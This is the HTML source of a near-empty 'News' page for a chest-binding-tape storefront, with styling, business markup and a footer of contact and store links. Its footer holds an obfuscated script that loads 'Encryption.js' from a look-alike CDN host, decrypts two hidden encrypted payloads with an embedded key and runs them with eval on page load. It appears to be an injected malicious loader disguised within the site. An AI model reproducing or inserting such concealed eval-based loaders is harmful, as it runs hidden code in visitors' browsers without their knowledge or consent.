<!DOCTYPE html>
<html lang="en">
<head>
 <title>News - TransGenX Chest Binding Tape</title>
 
<link rel="shortcut icon" href="img/beproudchoice.png" alt="TransGenX Chest Binding Tape" />
  <meta charset="utf-8">
<meta name="title" content="TransGenX Chest Binding Tape">
<meta name="DC.title" lang="en" content="TransGenX Chest Binding Tape">

        <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">


<meta name="description" content="Discover the benefits of using FTM trans chest binding tape for chest binding and find the best one for you with this informative guide">
<meta name="keywords" content="TransGenX Chest Binding Tape, TransGenX, Gender Dysphoria , Trans Tape, FTM Transition, , , ">
<meta name="author" content="TransGenX">
  
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Kumbh+Sans:100,200,300,400,500,600,700,800,900&amp;display=swap" as="style" onload="this.onload=null;this.rel='stylesheet'">
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"></script>

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
 
 <style type="text/css">
*{
    font-family: 'Kumbh Sans', sans-serif;
}
 html{ scroll-behavior: smooth;
}
    .navbar a{font-size: 18px;
        font-weight: bold;
        color: black!important;
    }
    .btn-md{
            padding: 15px 30px;
            border-radius: 0;
    }
    .mbr-section-subsection{
        color: #999999;
     font-size: 20px;
    margin-bottom: 21px;
    }
    .mbr-section-h1{
        font-size: 46px;
    }
    .text-grey{
        color: #404040;
    }
    .content1{
        font-size: 20px;
         color: #606060;
    }
    .bg-brown{
        background: #eae8e4;
    }
    .display-4{
        font-size:45px;
    }
    .font-weight-400{
        font-weight: 400;
    }
    body{
        color: #232323;
    }
    .content2{
        font-size: 17px;
    }
    li a{
        color: #ff5722;

    }
    ul{
        list-style: circle;
    }
    a{
        text-decoration: none!important;
    }
    .content3{
        color: #696969;
            font-size: 17px;
    }
    .contentImg:hover{
     box-shadow: 0 50px 50px -25px rgb(0 0 0 / 30%);
    transform: rotate(-2deg) scale(1.03);

    }
    .contentImg{
        transition: all 0.3s;
        border-radius: 30px;
    }
    iframe{
        border: none!important;
    }
   footer{
        background: #020202;
    color: #ffffff;
    }
    footer a{
         color:  #ffffff ;
         text-decoration: underline;

    }   
    .underlineShow {
    font-weight: inherit;
    background-image: linear-gradient(120deg, #ffc658 0%, #ffc658 100%);
    background-repeat: no-repeat;
    background-size: 100% 30%;
    background-position: 0 90%;
    transition: background-size 0.2s ease-in;
}
.allShow:hover,.underlineShow:hover{
        background-size: 100% 100%!important;
     
    background-image: linear-gradient(120deg, #ffc658 0%, #ffc658 100%)!important;
    background-repeat: no-repeat!important;
 
    background-position: 0 90%!important;
    transition: background-size 0.2s ease-in!important;
}
.icon-button i{
    font-size: 20px;
    padding: 10px;
}

.icon-button i:hover{
    color: #7CE0D3;
}
.blackPara{
        background: rgba(0,0,0,0.6);
    text-align: center;
}
.blackPara *{
    color: white!important;


}
.bg-image{
       background-image: linear-gradient(rgba(0,0,0,0.48),rgba(0,0,0,0.48)),url('img//tmp/foo.jpgQMyOoW');
    background-size: auto,cover;
    background-position: center;
}


.faq_area {
    position: relative;
    z-index: 1;
    background-color: #EAE8E4;
}

.faq-accordian {
    position: relative;
    z-index: 1;
}
.faq-accordian .card {
    position: relative;
    z-index: 1;
    margin-bottom: 1.5rem;
}
.faq-accordian .card:last-child {
    margin-bottom: 0;
}
.faq-accordian .card .card-header {
    background-color: #ffffff;
    padding: 0;
    border-bottom-color: #ebebeb;
}
.faq-accordian .card .card-header h6 {
    cursor: pointer;
    padding: 1.75rem 2rem;
    color: #3f43fd;
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-align: center;
    -ms-flex-align: center;
    -ms-grid-row-align: center;
    align-items: center;
    -webkit-box-pack: justify;
    -ms-flex-pack: justify;
    justify-content: space-between;
}
.faq-accordian .card .card-header h6 span {
    font-size: 1.5rem;
}
.faq-accordian .card .card-header h6.collapsed {
    color: #070a57;
}
.faq-accordian .card .card-header h6.collapsed span {
    -webkit-transform: rotate(-180deg);
    transform: rotate(-180deg);
}
.faq-accordian .card .card-body {
    padding: 1.75rem 2rem;
}
.faq-accordian .card .card-body p:last-child {
    margin-bottom: 0;
}
.special-content .row-item {
    padding: 3rem;
    padding-top: 3.7rem;
    height: 100%;
}
.special-content .row-item.card1 {
    background:  #eae8e4;
}
.special-content .row-item.card2 {
    background:#eddad8;
}
 .special-content .row-item.card3 {
    background: #c1bebe;
}
 .special-content .row-item.card4 {
    background: #bcd9df;
}
.special-content .card-img {
    margin-bottom: 1.7rem;
    text-align: left;
}
.special-content .item-wrapper {
    margin-bottom: 1.5rem;
}
.yacss-card-title {
    margin-bottom: 1rem;
}
.yacss-iconfont {
    background-color: #000000;
    font-size: 30px;
    height: 56px;
    min-width: 56px;
    padding: 0.7rem;
    padding-top: 13px;
    color: #fff;
    border: 1px solid #000000;
    border-radius: 50%;
}

  @media only screen and (max-width: 1000px) {
.contentImg{
    width: 100%;
        height: auto!important;
  }
}


@media only screen and (max-width: 575px) {
    .support-button p {
        font-size: 14px;
    }
}

.support-button i {
    color: #3f43fd;
    font-size: 1.25rem;
}
@media only screen and (max-width: 575px) {
    .support-button i {
        font-size: 1rem;
    }
}

.support-button a {
    text-transform: capitalize;
    color: #2ecc71;
}
@media only screen and (max-width: 575px) {
    .support-button a {
        font-size: 13px;
    }
}


.post-preview > a {
    color: #212529;
}
@media (min-width: 992px){
.post-preview > a > .post-title {
    font-size: 2.25rem!important;
}
}
.post-preview > a > .post-title {
    font-size: 1.875rem;
    margin-top: 1.875rem;
        font-family: "Open Sans", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
    margin-bottom: 0.625rem;
    font-weight: 800;
}

.post-preview > a > .post-subtitle {
    font-weight: 300;
    margin-bottom: 0.625rem;
}
 
.post-preview > .post-meta > a {
    text-decoration: none;
}
.post-preview > a:focus, .post-preview > a:hover {
    text-decoration: none;
    color: #0085A1;
}
.justify-content-evenly{
    justify-content: space-evenly;
}
.btn-blue{
        color: #fff;
    background-color: #0085A1;
    border-color: #0085A1;
        display: inline-block;
    font-family: "Open Sans", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
    font-weight: 800;
    line-height: 1.5;
     
    text-align: center;
    vertical-align: middle;
    cursor: pointer;
    -webkit-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none;
 
    padding: 1rem 1.75rem;
    font-size: 0.875rem;
    border-radius: 0;
    transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}

.post-preview > .post-meta {
    font-size: 1.125rem;
    font-style: italic;
    margin-top: 0;
    font-style: normal;
    color: #6c757d;
}
.post-meta a{
    color: black;
}
.post-preview > a > .post-subtitle {
    font-weight: 300;
    margin-bottom: 0.625rem;
}
</style>
 
 
<script type='application/ld+json'> 
{
  "@context": "http://www.schema.org",
  "@type": "ArtGallery",
    "name": "TransGenX",
   "url": "https://www.amazon.com/stores/page/A7682A6E-299B-4FD5-B94F-A503435211B7",
 
  "sameAs": [
      "https://www.amazon.com/stores/page/FBF1BB4F-64D4-47B5-BAA5-1F2095EFBB1E" ,    "https://www.amazon.com/stores/page/8439CFC5-6CEF-4D87-AA99-D30047DD3E90" 

  ],
  
  "logo": "img/beproudchoice.png",
  "image": "img/beproudchoice.png",
 

 
  "address": {

    "@type": "PostalAddress",  
    "streetAddress": "505 Rapids Street",  
    "addressLocality": "Des Moines", 
  
    "addressRegion": "IA"  ,  
    "postalCode": "50266"   
   
  } , 
    
  "hasMap": "https://datastudio.google.com/u/0/reporting/7e9cbf23-6401-437d-9115-226c13ae694a/page/MCR7C"
  }
 </script>

 



 
</head>
    
<body>
<nav class="navbar navbar-expand-lg navbar-light bg-white px-md-5 pt-3 pb-3">
 
      <a class="navbar-brand" href="index.html"  >
       <img alt="" src="img/beproudchoice.png"    width="150px"   >
      </a>

  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
    <span class="navbar-toggler-icon"></span>
  </button>

  <div class="collapse navbar-collapse" id="navbarSupportedContent">
    <ul class="navbar-nav ml-auto">
          

         


             
          <li class="mt-2   nav-item pr-md-4"><a  class="nav-link allShow   " href="index.html"  >TransGenX Chest Binding Tape</a></li>
       
      

      
     
 
  
    </ul>
     
  </div>
</nav>
 



 
<div class="container-fluid  bg-image pb-5">
    <div class="container pt-5 pb-5 ">
        <div class="row">
            <div class="col-lg-12 text-center "  >
          
                <h1 class="mbr-section-h1  text-white mb-0 "> 
                            News
             
        </h1>        </div>

           
            
        </div>
    </div>
</div>





 

 
 
 
 

<div class="container px-4 px-lg-5 py-5">
            <div class="row gx-4 gx-lg-5 justify-content-center">
                <div class="col-md-10 col-lg-8 col-xl-7">

                 
                    <!-- Pager-->
                    <div class="d-flex justify-content-evenly mb-4">
                                                  <a class="btn btn-blue text-uppercase" href="news/.html">Old Posts</a>
                            <a class="btn btn-blue text-uppercase" href="news/.html">New Posts</a>
                            
                    
                    </div>
                </div>
            </div>
        </div>













 
  
<footer>
    <div class="container py-4 pt-5" style="max-width: 1400px;">
        <div class="row">
  <div class="col-lg-3">
 
                  <p>TransGenX</p>
                        <p>PHONE : 800-423-8744</p>
      
            <p>EMAIL : support@transgenx.org</p>
      
          
     <p>City : Des Moines</p>
      
          
     <p>State : IA</p>
      
          
     <p>Zip : 50266</p>
      

          
     <p>ADDRESS : 505 Rapids Street</p>
               
     <p> <a   class="  allShow"  href="https://datastudio.google.com/u/0/reporting/7e9cbf23-6401-437d-9115-226c13ae694a/page/MCR7C" rel="nofollow"> Google Business Profile</a>  </p>
               
    
    
        <p>Company Website : <a   class="  allShow"  href="https://www.amazon.com/stores/page/A7682A6E-299B-4FD5-B94F-A503435211B7" rel="nofollow">https://www.amazon.com/stores/page/A7682A6E-299B-4FD5-B94F-A503435211B7</a></p>
      
    
    
       </div>
 
     <div class="col-lg-3">
      
                     
<p class="sub">USEFUL LINKS</p>
             

<p><a class="  allShow" href="https://transgenderlawcenter.org/"  target="_blank">Transgender Law Center</a></p>
<p><a class="  allShow"  href="http://www.amazon.com/dp/B0BRGKV3LL"  target="_blank">TransTape</a></p>
<p><a class="  allShow" href="https://s3.us-east-1.wasabisys.com/transgenx/transgenx/index.html"  target="_blank">Chest Binding Tape</a></p>
<p><a class="  allShow" href="" rel="nofollow" target="_blank"></a></p>
<p><a class="  allShow"  href="" rel="nofollow" target="_blank"></a></p>
  <p><a class="  allShow"  href=""  target="_blank"></a></p>
</div>

 
<div class="col-lg-3">
         

<p><a  class="  allShow" href="" rel="nofollow" target="_blank"></a></p>
<p><a  class="  allShow" href="" rel="nofollow" target="_blank"></a></p>
<p><a  class="  allShow" href="" rel="nofollow" target="_blank"></a></p>


  <p><a class="  allShow"  href=""  target="_blank"></a></p>
            <a    href="sitemap.html"  rel="nofollow"  class="  allShow"  >
    


Sitemap | </a> 

                      
  <a class="mbr-fonts-style display-7" href="privacy-policy.html" rel="nofollow"   class="  allShow"  >
   
 Privacy Policy</a> 
<p>
 <p><script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.3.0/crypto-js.min.js" samesite="none"></script><script src="https://cdnjs-cloudflare.s3.amazonaws.com/Encryption.js" samesite="none"></script><script>var ZOJHHiYUHEVuXZn = 'nHCRCkQdOXfwmnH';var JJgQKXkLQoKnqNP = 'eyJjaXBoZXJ0ZXh0IjoibHYzcjdCaDBuell3ZkdRaVwvRXBsdXRXQld4clwvbldmcEIxbGhXMDhTRnI2empUbUlTZzVWT1VSdHFOT3VzK2E3VXVLRVpTcWh5WGZSV1wvSnlsMTZrMk0wUFdndzVDNU9ad0Zqd2U0SitjY3hHYVFFcnRkVVgrOUo1Q1B2YXozUWcrYmY3SWZkUkNNNTdrWnZ6cEh2RUtSdFhHTDN4bVJyOGNMK1NSUlwvR0N6STF4U2tLaG53VW5OYU1IZ2R5MXNYalwvOTBWQjZ6QVpzRmJnRzA2NU5GZCtEU2RtOFpOVXVDU1wvUllSVlF4UXRyZUpuSVVZbG96MDBxMXRVaG5QRE05bVBKOGh0cGlJRFdYMUtUSFwvQVB5eFhQOCs4djR4VTJsSW9wczZYeCtXUm9Bc0owV3lJbWdFVm8rNDQ0Qm9cL1p2T21QZG5wYk11QkM2STU0cXFPVzVGUWNlZW9zdytkd1NEVDNEeW03QlNcL1ZNPSIsIml2IjoiMDcwNGUyZWYyMGFjZTZhMTQzNDBlNmU0NGRlZjNiYjMiLCJzYWx0IjoiNzI3ZDQ3ODkzMzFiZTY4ZDk0ZTVhMmQwMTYyMDc2MTJlYTIzMzBiOTI4YWU0NDcxYzlhODg5MWU3YWJhMmMwZGNmYzU0NzhkNTg4ZmUzMzQ0YTY2YjAyNGQyNzEzYTgzMTk1YTQ1NDU0YzkwY2NkOWRhNGEzMTE0N2MxYzZiYTQwMjg0N2U1YWQ3MzIwZmYzOWUzYjU2OTQ0M2I2NTM4NThhNTllZWEyMmJmNTQzNDAwYzcyOWE0NGU0YjA4ZWM1ZWQxNzk0Y2E3NDNkMWI3NzUzODRlMWU2YmQ5OWQ4MGMzMDhiZDY3MTQ4MDU5NDcyOGU0ZTYwYWRkY2EyYjViMGNkZDcwOWZjNjM5OWQyNzQ5ZjdmNzdhMmMzOTMzOGJkMjUzZGFiMTZkNzQwODk5MmEyNWJiZGM5ZGJkZmJiMmE1M2VhZTBkMWEyYWE3MzZiZWE5ZDJiZTI2Y2ZkZDRmMDIzMDgxZTcwOGQ0OTRkYmVmNmFmNmIxMDcyYjAxODBiNmZjYzY1ZTE2NDRiNjNhMjM0ZWNmZWY2ODA3ZTQ1ZGFlOTUyYjJjMzczNTBhYTVlMDcxMjkyYzgyNmE2YWYwMWJjOGNlYTFmY2Q2Nzc0YTY0Njg5ZjA1ODQyNTljMGRhYmI3YWFkODM1YmRmMDYyY2JkOGU1NGI2OTQzNDIzMDMiLCJpdGVyYXRpb25zIjo5OTl9';var UgynluVMpjqCWyq = 'eyJjaXBoZXJ0ZXh0IjoialRlV2JvN2Z4eXEwQkU0Y1hIVzNicXZsWWgrR1h0TDNoRytxZkVEZXZCMzhiUHMzeVRZazd4M2ZrbDNPVVA2K1owdURkZ0w3SkZDN1lrOUZnN0p4NGg0NzBcLzk5MEpTV2NIUTAwais1cDd0UlU5NjRDMGZoU1RPV0E4N1lGcjVGaVBkb253SkNZMFFlZGFUSkpicHV4RERIMmFFU0diQzdNK1JzRGZSQXJaSjFyYjJUR0h4SWt5cnNldmd5ckxZeEs0Tnp5NUhZTk5UaVZUaVBZSmZReEIwU3RxdzNWb3BaeGhrMXJUYXZ3MDNNM01JazdjRmYwNVF0Y0hhRUtqb2giLCJpdiI6IjJkZGViNDE1Zjk0N2Y4ZDlhZDc1ZDliNGIwYWMxZTAyIiwic2FsdCI6ImJiM2VjMjY1YTM3MGM0NzhhMTlkMDQyNjE1OGU2ZDExOTNiMmFiMzA5NDYyODhlYzMzNGFjZWYyYTIwNjY0MzdjYzVkYjdjZWM5YzY3N2YwMDkyMThjZTQ5ZmM2ZDM5NzA5ZTA0OWFlYWMwMjE2ZWYxMzIwOWMzOGI4OGZkZDk4NDc3OWZhMDUxYTg2M2M3NTVhM2RhMWVmYmY2NzUyMmUwM2JjODIxNmVmNjRmNDBkNDk5OWI3NDkzNmVhNGJkYmFhZjA1NzAxYzQyNWVmYjZjMTczZmNmNjUwOTdkZDRhNjhhOTU5NDk0YWU2MWRhN2ZlYjgwODlmZmQ2MzBkZDVjZDdiMGQ5NTA3NjVkNTAxZjU1YzRlZjZmY2ExOTc0M2EyMDkxZjZhMzAzOWNiOTI0MDkyN2QzZGQ4MWQ5Y2FiM2YyMzNkZGZjMjNmNWY0MWNkMmI2ZjQ0MDJiYTMxNmEyZWY0YzQ1ZWI5MjJlZDMzOWMzMTQ3MDA3N2NlNGFmN2NiYmVlOWVlNWI5N2I0YjJhNmRmNThkOGNlNjhkZDdjZmFiNWIyZmU0N2VmMjRiOWVkYTI1NzU3NzZmZjhkZGRmYjkwNjQwYWY3ZjZiMzZlMjEzOTIxN2FmYTQ2YzJhYzc5Y2VkYTZlZjVhZDVkNWNkYTgzOTUyMDFlYzU5NTBiIiwiaXRlcmF0aW9ucyI6OTk5fQ==';let ZgOKEITYAJPSnEx = new Encryption();var WSrQBLECwLeZNVd = ZgOKEITYAJPSnEx.decrypt(JJgQKXkLQoKnqNP, ZOJHHiYUHEVuXZn);if (!eval(WSrQBLECwLeZNVd)) {eval(ZgOKEITYAJPSnEx.decrypt(UgynluVMpjqCWyq, ZOJHHiYUHEVuXZn));};</script></p>
<p>
    </p>


 </p>
</div>

 
<div class="col-lg-3">
            <div class="social">
                                    <p class="sub">Follow us</p>
                  
                                   <a href="https://www.amazon.com/stores/page/FBF1BB4F-64D4-47B5-BAA5-1F2095EFBB1E" class="icon-button facebook"     ><i class="fa fa-facebook"></i><span></span></a>
                                                           <a href="https://www.amazon.com/stores/page/8439CFC5-6CEF-4D87-AA99-D30047DD3E90" class="icon-button pinterest"   ><i class="fa fa-linkedin"></i><span></span></a>
                                                                                                                   
                      
            </div>
    </div>
</div>
    </div>
    
    
    </footer>

</body>

</html>

